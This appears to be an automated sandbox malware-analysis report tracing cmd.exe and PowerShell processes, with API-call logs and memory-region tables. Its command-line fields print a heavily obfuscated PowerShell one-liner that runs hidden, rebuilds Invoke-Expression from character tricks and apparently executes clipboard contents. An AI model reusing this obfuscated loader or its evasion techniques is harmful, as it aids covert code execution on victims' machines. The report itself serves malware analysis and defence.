| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NOp -W 1 |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
|
For performance reasons, the remaining 16377 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #4: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /CpOWErSHELL -NOp -W 1 " & ( $PShome[4]+$pShOme[30]+'X') ( (-JOin[REgEX]::maTcHEs(\" ) )93]RaHc[,'FPr' eCaLPerc-69]RaHc[,'Bcp' eCaLPerc- 63]RaHc[,'KnC' eCaLPerc- 43]RaHc[,'juy' eCaLPerc-)')}d{KnC()FPreiFPr,FPrxFPrf- juy}0{}1{juy(.;)}juytXBcpETjuy.}BBcpt{KnC=}d{KnC'+';juytxeBcpTjuy.}'+'BBcpt{KnC;)(ekovnI.)FPretsaFPr,FPrPFPrf-'+'juy}1{}0{juy(.}bT{'+'KnC;}EuRBcpT{KnC '+'= juyeNIBcplBcpitLuMjuy.}BBcpt{KnC;)FPretsyFPr,FPrS'+'FPr,FPrsmroFFPr,FPr.swodniW.mFPr,FPrxoBFPr,FP'+'rtxeT.FPrf'+'- juy}1{}0{}3{}2{}5{}4{juy( )FPrtcFPr,FPrNFPr,FPrejbO-weFPrf- juy}2{}0{}1{juy(^& = }BBcpt{KnC{ esle })juytxBcpeTBcpedOcIN'+'ujuy::qArhIzKnC ('+'juytxeBcpTtEgjuy::EuLAV.) )FPr9FPr'+'+FPrT42JFPr( )F'+'PrAVFPr,FPrELBaIrFPr f-juy}0{}1{juy(. ( =}D{KnC{ )FPrATSFPr qe- )(ekovnI.)FPrS'+'oTFPr,FPrrtFPr,FPrgniFPrf-juy}0{}1{}2{juy(.juyetABcpTBcpStnEmTRABcpPAjuy.juydABcpErhTtNBcpEBcprRucjuy:'+':EUlaV.) )FPrUFPr+FPrXSFPr+FPr:e'+'lFPr'+'+FPrbaIraVFPr( )FPreGFPr'+',FPr-TFPr,FPrMEtiFPr f-juy}0{'+'}1{}2{juy(. ( ( fi(KnC;)FPrW.FPr,FPrsmroF.'+'swodniFPr,FPreFPr,FPrtsyS'+'FPr,F'+'PrmFPrf- juy}3{}4{}0{}2{}1{juy( emaNylbmessA- )FPrdAFPr,FPrT-d'+'FPr,FPr'+'epyFPrf-juy}0{}1{}2{juy(^&;})FPraobpilFPr,FPrC-teGFP'+'r,FPrdrFPr f- juy}0{}2{}'+'1{juy(.=}d{KnC{ )0 ae- )'+'FPrilC-tFPr,FPro'+'bpFPr,FPrdraFPr'+',FPreGFPrf- '+'juy}1{}'+'2{}3{}0{juy( )FPrmFPr,FPrcgFPr f- juy}1{}0{juy(^&( fi;'+' )FPrtxeFPr,FPrtaFPr,FPrATaFPr,FPrM'+'ROF'+'FPr,FPrT.Smrof.SWoDNiw.meFPr'+',FPrdFPr,FPrTsYsFPrf-juy}5{}3{}4{}1{}'+'6{}2{}0{juy(]ePYT[ = QARHIzKnC '+'; )FPrlC.SFPr,FPrmRoFPr,FPrDFPr,FPrfFPr,FPrraoFPr,FPrw.METSFPr,FPrbPIFPr,FPrsFPr,FPrYFPr,FPr.sWoDnIFPrF-juy}7{}5{}3{}9{}8'+'{}6{}'+'0{}4{}1{}2{juy(]ePYT[ =9T42'+'jKnC ;)FPrtFPr'+',FPrAerHTFPr,FPr.GNiDFPr,FPrdAFPr,F'+'PrErhFPrf-ju'+'y}1{}0{}4{}2{}3{juy('+']epyt[ = uXsKnC'+' '(( ( )'x'+]43[emOHSp$+]12[emohsP$ (^& \",'.' ,'rigHT'+'tO'+'leFT' )) ) " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:01:21, Reason: Self Terminated |
| Monitor Duration | 00:00:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb5c |
| Parent PID | 0xacc (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x01d7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x020c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x020d0000 | 0x0239efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a470000 | 0x4a4c8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee6150000 | 0x7fee6157fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xb60
54
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-11-14 09:19:45 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 122663 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4a470000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xb64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #5: powershell.exe
201
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | pOWErSHELL -NOp -W 1 " & ( $PShome[4]+$pShOme[30]+'X') ( (-JOin[REgEX]::maTcHEs(\" ) )93]RaHc[,'FPr' eCaLPerc-69]RaHc[,'Bcp' eCaLPerc- 63]RaHc[,'KnC' eCaLPerc- 43]RaHc[,'juy' eCaLPerc-)')}d{KnC()FPreiFPr,FPrxFPrf- juy}0{}1{juy(.;)}juytXBcpETjuy.}BBcpt{KnC=}d{KnC'+';juytxeBcpTjuy.}'+'BBcpt{KnC;)(ekovnI.)FPretsaFPr,FPrPFPrf-'+'juy}1{}0{juy(.}bT{'+'KnC;}EuRBcpT{KnC '+'= juyeNIBcplBcpitLuMjuy.}BBcpt{KnC;)FPretsyFPr,FPrS'+'FPr,FPrsmroFFPr,FPr.swodniW.mFPr,FPrxoBFPr,FP'+'rtxeT.FPrf'+'- juy}1{}0{}3{}2{}5{}4{juy( )FPrtcFPr,FPrNFPr,FPrejbO-weFPrf- juy}2{}0{}1{juy(& = }BBcpt{KnC{ esle })juytxBcpeTBcpedOcIN'+'ujuy::qArhIzKnC ('+'juytxeBcpTtEgjuy::EuLAV.) )FPr9FPr'+'+FPrT42JFPr( )F'+'PrAVFPr,FPrELBaIrFPr f-juy}0{}1{juy(. ( =}D{KnC{ )FPrATSFPr qe- )(ekovnI.)FPrS'+'oTFPr,FPrrtFPr,FPrgniFPrf-juy}0{}1{}2{juy(.juyetABcpTBcpStnEmTRABcpPAjuy.juydABcpErhTtNBcpEBcprRucjuy:'+':EUlaV.) )FPrUFPr+FPrXSFPr+FPr:e'+'lFPr'+'+FPrbaIraVFPr( )FPreGFPr'+',FPr-TFPr,FPrMEtiFPr f-juy}0{'+'}1{}2{juy(. ( ( fi(KnC;)FPrW.FPr,FPrsmroF.'+'swodniFPr,FPreFPr,FPrtsyS'+'FPr,F'+'PrmFPrf- juy}3{}4{}0{}2{}1{juy( emaNylbmessA- )FPrdAFPr,FPrT-d'+'FPr,FPr'+'epyFPrf-juy}0{}1{}2{juy(&;})FPraobpilFPr,FPrC-teGFP'+'r,FPrdrFPr f- juy}0{}2{}'+'1{juy(.=}d{KnC{ )0 ae- )'+'FPrilC-tFPr,FPro'+'bpFPr,FPrdraFPr'+',FPreGFPrf- '+'juy}1{}'+'2{}3{}0{juy( )FPrmFPr,FPrcgFPr f- juy}1{}0{juy(&( fi;'+' )FPrtxeFPr,FPrtaFPr,FPrATaFPr,FPrM'+'ROF'+'FPr,FPrT.Smrof.SWoDNiw.meFPr'+',FPrdFPr,FPrTsYsFPrf-juy}5{}3{}4{}1{}'+'6{}2{}0{juy(]ePYT[ = QARHIzKnC '+'; )FPrlC.SFPr,FPrmRoFPr,FPrDFPr,FPrfFPr,FPrraoFPr,FPrw.METSFPr,FPrbPIFPr,FPrsFPr,FPrYFPr,FPr.sWoDnIFPrF-juy}7{}5{}3{}9{}8'+'{}6{}'+'0{}4{}1{}2{juy(]ePYT[ =9T42'+'jKnC ;)FPrtFPr'+',FPrAerHTFPr,FPr.GNiDFPr,FPrdAFPr,F'+'PrErhFPrf-ju'+'y}1{}0{}4{}2{}3{juy('+']epyt[ = uXsKnC'+' '(( ( )'x'+]43[emOHSp$+]12[emohsP$ (& \",'.' ,'rigHT'+'tO'+'leFT' )) ) " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:01:21, Reason: Self Terminated |
| Monitor Duration | 00:00:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb64 |
| Parent PID | 0xb5c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B68
0x
B6C
0x
B70
0x
B74
0x
B78
0x
B80
0x
B84
0x
B94
0x
BF0
0x
BFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00070000 | 0x00072fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00130000 | 0x00196fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x001e0000 | 0x001e3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x001f0000 | 0x0020ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00220000 | 0x0024ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00250000 | 0x00253fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x0043efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01d6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x01d70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x01d82fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d90000 | 0x01d90000 | 0x01d90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01ddffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01ee0000 | 0x01ee2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01f00000 | 0x01f04fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01f10000 | 0x01f17fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001f20000 | 0x01f20000 | 0x01f20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x01faffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02030000 | 0x02095fff | Memory Mapped File | r |
|
|
|
- |
| sortkey.nlp | 0x020a0000 | 0x020e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x0216ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02170000 | 0x0243efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002440000 | 0x02440000 | 0x02832fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02840fff | Pagefile Backed Memory | r |
|
|
|
- |
| mscorrc.dll | 0x02840000 | 0x02893fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x028d0000 | 0x0298ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a40000 | 0x02a40000 | 0x02b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02bdffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cb0000 | 0x02cb0000 | 0x1acaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001acb0000 | 0x1acb0000 | 0x1b37ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b380000 | 0x1b380000 | 0x1b480fff | Private Memory | rw |
|
|
|
- |
| gdipfontcachev1.dat | 0x1b4d0000 | 0x1b4ebfff | Memory Mapped File | rw |
|
|
|
|
| private_0x000000001b580000 | 0x1b580000 | 0x1b5fffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b600000 | 0x1b8e1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b8f0000 | 0x1b8f0000 | 0x1b9effff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x75470000 | 0x75538fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
